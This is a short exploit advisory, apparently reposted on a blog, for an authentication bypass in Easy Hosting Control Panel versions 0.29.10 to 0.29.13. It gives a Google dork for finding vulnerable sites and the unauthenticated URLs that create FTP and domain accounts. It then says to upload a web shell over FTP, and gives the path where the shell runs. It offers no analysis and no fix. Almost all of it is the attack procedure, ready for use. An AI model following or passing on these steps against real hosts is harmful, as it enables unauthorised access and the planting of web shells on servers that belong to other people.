# Exploit Title: Easy Hosting Control Panel Admin Auth Bypass |
# Google Dork: inurl:/ehcp/?op=applyfordomainaccount |
# Date: 10/04/2011 |
# Author: Jasman |
# Software Link: https://launchpad.net/ehcp & http://www.ehcp.net |
# Version: 0.29.10 - 0.29.13 |
# Tested on: Ubuntu, Debian |
+ Description |
Easy Hosting Control Panel designed for hosting of multiple domains on single machine. |
It uses LAMP(LinuxApacheMysqlPhp). Its aim:easily installable,easy usage, non-complex,functional |
+ Vulnerable: |
to add a ftp account & domain does not require a login. |
http://site.com/vhosts/ehcp/?op=applyforaccount |
http://site.com/vhosts/ehcp/?op=applyforftpaccount |
http://site.com/vhosts/ehcp/?op=applyfordomainaccount |
+ Exploit |
upload a shell via ftp |
http://site.com/vhosts/[username]/[domain]/httpdocs/shell.php |
+ Tested On |
0.29.13 |
0.29.11 |
0.29.10 |
No comments:
Post a Comment